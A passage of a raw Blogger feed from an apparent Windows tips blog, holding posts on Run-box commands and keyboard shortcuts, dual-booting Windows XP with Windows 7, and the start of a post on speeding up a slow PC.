&lt;span style="font-size: x-large;"&gt;&lt;span style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;Type the following commands in your Run Box (Windows Key + R) or Start Run&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
devmgmt.msc = Device Manager&lt;br /&gt;
msinfo32 = System Information&lt;br /&gt;
cleanmgr = Disk Cleanup&lt;br /&gt;
ntbackup = Backup or Restore Wizard (Windows Backup Utility)&lt;br /&gt;
mmc = Microsoft Management Console&lt;br /&gt;
excel = Microsoft Excel (If Installed)&lt;br /&gt;
msaccess = Microsoft Access (If Installed)&lt;br /&gt;
powerpnt = Microsoft PowerPoint (If Installed)&lt;br /&gt;
winword = Microsoft Word (If Installed)&lt;br /&gt;
frontpg = Microsoft FrontPage (If Installed)&lt;br /&gt;
notepad = Notepad&lt;br /&gt;
wordpad = WordPad&lt;br /&gt;
calc = Calculator&lt;br /&gt;
msmsgs = Windows Messenger&lt;br /&gt;
mspaint = Microsoft Paint&lt;br /&gt;
wmplayer = Windows Media Player&lt;br /&gt;
rstrui = System Restore&lt;br /&gt;
netscp6 = Netscape 6.x&lt;br /&gt;
netscp = Netscape 7.x&lt;br /&gt;
netscape = Netscape 4.x&lt;br /&gt;
waol = America Online&lt;br /&gt;
control = Opens the Control Panel&lt;br /&gt;
control printers = Opens the Printers Dialog&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;Internet Browser:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Type in u're address "google", then press [Right CTRL] and [Enter]&lt;br /&gt;
It add www. and .com to word and go to it&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;For Windows XP:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Copy. CTRL+C&lt;br /&gt;
Cut. CTRL+X&lt;br /&gt;
Paste. CTRL+V&lt;br /&gt;
Undo. CTRL+Z&lt;br /&gt;
Delete. DELETE&lt;br /&gt;
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE&lt;br /&gt;
Copy selected item. CTRL while dragging an item&lt;br /&gt;
Create shortcut to selected item. CTRL+SHIFT while dragging an item&lt;br /&gt;
Rename selected item. F2&lt;br /&gt;
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW&lt;br /&gt;
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW&lt;br /&gt;
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW&lt;br /&gt;
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW&lt;br /&gt;
Highlight a block of text. CTRL+SHIFT with any of the arrow keys&lt;br /&gt;
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys&lt;br /&gt;
Select all. CTRL+A&lt;br /&gt;
Search for a file or folder. F3&lt;br /&gt;
View properties for the selected item. ALT+ENTER&lt;br /&gt;
Close the active item, or quit the active program. ALT+F4&lt;br /&gt;
Opens the shortcut menu for the active window. ALT+SPACEBAR&lt;br /&gt;
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4&lt;br /&gt;
Switch between open items. ALT+TAB&lt;br /&gt;
Cycle through items in the order they were opened. ALT+ESC&lt;br /&gt;
Cycle through screen elements in a window or on the desktop. F6&lt;br /&gt;
Display the Address bar list in My Computer or Windows Explorer. F4&lt;br /&gt;
Display the shortcut menu for the selected item. SHIFT+F10&lt;br /&gt;
Display the System menu for the active window. ALT+SPACEBAR&lt;br /&gt;
Display the Start menu. CTRL+ESC&lt;br /&gt;
Display the corresponding menu. ALT+Underlined letter in a menu name&lt;br /&gt;
Carry out the corresponding command. Underlined letter in a command name on an open menu&lt;br /&gt;
Activate the menu bar in the active program. F10&lt;br /&gt;
Open the next menu to the right, or open a submenu. RIGHT ARROW&lt;br /&gt;
Open the next menu to the left, or close a submenu. LEFT ARROW&lt;br /&gt;
Refresh the active window. F5&lt;br /&gt;
View the folder one level up in My Computer or Windows Explorer. BACKSPACE&lt;br /&gt;
Cancel the current task. ESC&lt;br /&gt;
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;Use these keyboard shortcuts for dialog boxes:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
To Press&lt;br /&gt;
Move forward through tabs. CTRL+TAB&lt;br /&gt;
Move backward through tabs. CTRL+SHIFT+TAB&lt;br /&gt;
Move forward through options. TAB&lt;br /&gt;
Move backward through options. SHIFT+TAB&lt;br /&gt;
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter&lt;br /&gt;
Carry out the command for the active option or button. ENTER&lt;br /&gt;
Select or clear the check box if the active option is a check box. SPACEBAR&lt;br /&gt;
Select a button if the active option is a group of option buttons. Arrow keys&lt;br /&gt;
Display Help. F1&lt;br /&gt;
Display the items in the active list. F4&lt;br /&gt;
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Display or hide the Start menu. WIN Key&lt;br /&gt;
Display the System Properties dialog box. WIN Key+BREAK&lt;br /&gt;
Show the desktop. WIN Key+D&lt;br /&gt;
Minimize all windows. WIN Key+M&lt;br /&gt;
Restores minimized windows. WIN Key+Shift+M&lt;br /&gt;
Open My Computer. WIN Key+E&lt;br /&gt;
Search for a file or folder. WIN Key+F&lt;br /&gt;
Search for computers. CTRL+WIN Key+F&lt;br /&gt;
Display Windows Help. WIN Key+F1&lt;br /&gt;
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L&lt;br /&gt;
Open the Run dialog box. WIN Key+R&lt;br /&gt;
Open Utility Manager. WIN Key+U&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;Accessibility keyboard shortcuts:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Switch FilterKeys on and off. Right SHIFT for eight seconds&lt;br /&gt;
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN&lt;br /&gt;
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK&lt;br /&gt;
Switch StickyKeys on and off. SHIFT five times&lt;br /&gt;
Switch ToggleKeys on and off. NUM LOCK for five seconds&lt;br /&gt;
Open Utility Manager. WIN Key+U&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;Shortcuts you can use with Windows Explorer:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Display the bottom of the active window. END&lt;br /&gt;
Display the top of the active window. HOME&lt;br /&gt;
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)&lt;br /&gt;
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)&lt;br /&gt;
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)&lt;br /&gt;
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW&lt;br /&gt;
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
Read Also.. &lt;a href="http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html"&gt;All The Hacking Techniques&lt;/a&gt;&lt;br /&gt;
Njoy..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-8818054533040881030?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/8818054533040881030/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/getting-used-to-using-your-keyboard.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/8818054533040881030'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/8818054533040881030'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/getting-used-to-using-your-keyboard.html' title='All The Keyboard Shortcuts You Need..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-6954822295692841924</id><published>2009-10-03T20:08:00.000+05:30</published><updated>2009-10-03T20:18:28.682+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Install Windows XP in Dual Boot with Pre-Installed Windows 7/Windows Vista..</title><content type='html'>&lt;span style="color: #333333; font-family: 'Lucida Grande', 'Trebuchet MS', Verdana, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-size: 17px; line-height: 19px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Prepare your system&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Windows 7 creates a small "hidden" System partition on which it places the boot system files, bootmgr and the folder Boot. Windows XP needs to have access to that partition so that it too can place it's boot system files there. They are ntldr, boot.ini and NTDETECT.COM.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1. Assign a Drive Letter to the System Partition&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Go to Disk Management in Windows 7 by right clicking Computer and select Manage and then Disk Management. Right click the drive tagged (System). It won't have a drive letter allocated, so that's the first thing you need to do so that it's visible to Windows XP setup . Allocate a drive letter by selecting "Change Drive Letter and Paths..." and then click Add and assign the first drive letter offered in the dialogue box that opens.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;span style="color: #333333; font-family: 'Lucida Grande', 'Trebuchet MS', Verdana, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;2. Create a Partition on which to install Windows XP&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Unless you have a second hard drive on which to install Windows XP, you will need to create a partition on which to install it. You can achieve this by "shrinking" the Windows 7 partition. This will leave you with "unallocated" space on your hard drive and it's recommended that you do not actually create a partition or format it from within Windows 7 as Windows XP uses an earlier version of the file system NTFS.&lt;br /&gt;
&lt;br /&gt;
Still in Disk Management, right click the large Windows 7 installation partition and select "Shrink Volume". After disk management has finished querying the available shrink space, a dialogue box will open where you need to insert the amount of space you want to shrink the partition by. Click on Shrink when you've decided how much space you want available for Windows XP.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Care and some judgment needs to be exercised here as selecting the offered default WILL result in inadequate space being left available for the use of Windows 7&lt;/span&gt;. &lt;br /&gt;
&lt;br /&gt;
You will now be left with unallocated space at the end of your drive. As previously mentioned, it's recommended that you do not create a partition or format it from Windows 7. That is best done using Windows XP setup so that the fully compatible Windows XP NTFS file system is applied to the partition.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;You have now completed preparation for the installation of Windows XP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="font-size: 17px; line-height: 19px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Install Windows XP&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Insert your Windows XP setup disc, restart your system and boot to your XP CD to install Windows XP. When you get to the setup screen where the drives/partitions are listed, select the unpartitioned space you created in Windows 7 and create a partition by pressing C on the keyboard. Once the partition is created, press Enter to install XP on that partition and then format the partition. A quick format is fine.&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="color: #333333; font-family: 'Lucida Grande', 'Trebuchet MS', Verdana, Helvetica, Arial, sans-serif; font-size: 100%;"&gt;&lt;span style="font-size: 13px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="color: #333333; font-family: 'Lucida Grande', 'Trebuchet MS', Verdana, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Once you have completed the installation of Windows XP you will have temporarily lost your ability to boot into Windows 7. You will now need to restore a dual boot to both Windows 7 and Windows XP.&lt;br /&gt;
&lt;br /&gt;
It is recommended that you install all device drivers in Windows XP or at the very least, the Chipset drivers for your motherboard. After that is done, download and install &lt;a class="postlink" href="http://www.vistabootpro.org/" style="border-bottom-color: rgb(96, 117, 168); border-bottom-style: solid; border-bottom-width: 1px; color: #314168; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;VistaBootPRO&lt;/a&gt; and be sure to follow the prompts to install the applications Prerequisites, .Net Framework 2.00 or higher, as VistaBootPRO will not run without it.&lt;br /&gt;
&lt;br /&gt;
Open VistaBootPRO, ignore the prompt to backup your BCD. Go to the System Bootloader tab, select "Windows Vista Bootloader" in the first section and "All Drives" in the second section and then click Install Bootloader . Next, go to the Diagnostics item on the menu bar and select "Run Diagnostics". VistaBootPRO will default back to the Manage OS Entries page and you will see that you now have entries there for "Windows 7" as well as "Earlier version of Windows". Change the name of the Windows XP entry using VistaBootPRO if you wish. Restart your system and select the operating system you would like to boot to.&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="color: #333333; font-family: 'Lucida Grande', 'Trebuchet MS', Verdana, Helvetica, Arial, sans-serif; font-size: 100%;"&gt;&lt;span style="font-size: 13px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="color: #333333; font-family: 'Lucida Grande', 'Trebuchet MS', Verdana, Helvetica, Arial, sans-serif; font-size: 180%;"&gt;&lt;span style="font-size: 17px; line-height: 19px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="color: #333333; font-family: 'Lucida Grande', 'Trebuchet MS', Verdana, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-size: 17px; line-height: 19px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Alternative Method to Create a Dual Boot Menu&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
After installing Windows XP you will have temporarily have lost the ability to boot to Windows 7. Here's an alternative method to restore your dual boot.&lt;br /&gt;
&lt;br /&gt;
1. From Windows XP, open My Computer and go to Tools&amp;gt;Folder Options&amp;gt;View. Check the check box for "Show hidden files and folders", and un-check "Hide protected operating system files (Recommended)". &lt;br /&gt;
&lt;br /&gt;
2. From My Computer, open the System partition. It should be drive C:\&lt;br /&gt;
&lt;br /&gt;
3. Select and copy the Windows XP boot system files ntldr, boot.ini and NTDETECT.COM&lt;br /&gt;
&lt;br /&gt;
4. Open the XP installation partition and paste those three files to the root of the partition.&lt;br /&gt;
&lt;br /&gt;
5. Install and open VistaBootPRO and go to the Manage OS Entries page. Check Add New OS Entry, give your Windows XP entry a name such as Windows XP, select Windows Legacy from the drop down menu and allocate the drive letter as seen from My Computer. Click on Apply Updates&lt;br /&gt;
&lt;br /&gt;
6. Now go to the System Bootloader page of VistaBootPRO and select to install the Windows Vista Bootloader&amp;gt;All Drives&amp;gt;Install Bootloader. If you cannot see the Install Bootloader button, close VistaBootPRO, change your screen resolution to 1024 X 768 or better and then proceed with these directions.&lt;br /&gt;
&lt;br /&gt;
7. Reboot and test each of the boot menu items to make sure they are good. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-6954822295692841924?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/6954822295692841924/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/install-windows-xp-in-dual-boot-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/6954822295692841924'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/6954822295692841924'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/install-windows-xp-in-dual-boot-with.html' title='Install Windows XP in Dual Boot with Pre-Installed Windows 7/Windows Vista..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-4399264468524573594</id><published>2009-10-03T19:52:00.001+05:30</published><updated>2009-10-03T19:58:05.731+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>10 ways to speed up slow computer</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_5rpSJrmeITE/SsdePIkdcMI/AAAAAAAAABY/Xh7KoNtYjnQ/s1600-h/imagem_wallpaper_xp-gloss_15.jpg"&gt;&lt;img style="text-align: right;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 200px; height: 150px; " src="http://3.bp.blogspot.com/_5rpSJrmeITE/SsdePIkdcMI/AAAAAAAAABY/Xh7KoNtYjnQ/s200/imagem_wallpaper_xp-gloss_15.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5388379093263544514" /&gt;&lt;/a&gt;&lt;div style="text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica; font-size: 12px; color: rgb(51, 51, 51); line-height: 21px; "&gt;I see a lot of Windows users always complain "My computer/pc is too slow. How to speed up my pc speed performance?" and they need a new PC. Upgrading the PC is always a viable option for better performance, but here are things that you can do to keep your PC healthy and i am sure this will help you to make your PC faster. But changing pc everytime is a costly affair and hence i have listed below 10 perfect ways to help you improve your computer speed performance. Thus, you will be able to speed up your computer/pc for free.
&lt;span class="fullpost" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; display: inline; "&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;The last time u installed Windows it worked very smoothly on your first boot right? The boot process was faster, applications were running quickly and smoothly, no errors. Now why does it takes such a long time to boot and takes lot of memory? What can i possibly do to restore my PC that earlier state?&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;
&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;The answer is pretty simple. You have to take care of your pc and tweak a bit.You only have to understand why your pc is slowing down and do things to prevent from slowing down.&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Here are 10 simple ways to speed your PC:&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;1. Using an Anti-Virus, Spyware and Adware removal program:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;If you use Internet frequently, chances are that you pc is infected by any adware or spyware if you not using a good anti virus/anti-malware program. Most adware’s and spywares open multiple connections to access internet spreading infection all over the web. This may slow down your pc, other harmful viruses might crunch your memory and system resources mostly slowing down startup process. Therefore,&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;ul style="margin-top: 0px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 30px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; list-style-type: square; list-style-position: initial; list-style-image: initial; "&gt;Use a good antivirus, adware, spyware removal Software.&lt;/li&gt;&lt;li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 30px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; list-style-type: square; list-style-position: initial; list-style-image: initial; "&gt;Make sure you UPDATE it regularly.&lt;/li&gt;&lt;li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 30px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; list-style-type: square; list-style-position: initial; list-style-image: initial; "&gt;Enable the auto update mode for better security.&lt;/li&gt;&lt;li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 30px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; list-style-type: square; list-style-position: initial; list-style-image: initial; "&gt;Run regular scans (weekly scheduled scanning recommended).&lt;/li&gt;&lt;/ul&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;2. Defragmenting Hard drives:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;The files when moved or created on your PC are stored into small fragments randomly on your disk drive. When you open those files it takes time to gather all those chunks and put them back together to form that single file. When you defragment your drive all those scattered fragments are arranged properly on the drive thus loading application bit faster. There is a &lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Disk Defragmenter&lt;/strong&gt; utility in windows,&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Open &lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;My Computer&lt;/em&gt; &gt; Right click on the disk drive you want to defragment &gt; Select &lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Properties&lt;/em&gt; &gt; Under &lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Tools&lt;/em&gt;tab click &lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Defragment Now.&lt;/em&gt; But i recommend &lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Power Defragmenter&lt;/strong&gt; a small free utility by sysinternals which is faster and with various options.&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;3. Clean Registry:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Windows registry is a database of information of all the files, folders and the windows configuration. This database grows as you use windows, can also become erroneous. Thus, it becomes necessary to clean and repair registry errors regularly. Use CCleaner, a tiny Freeware to scan and fix registry issues.&lt;/p&gt;&lt;div style="margin-top: 0px; 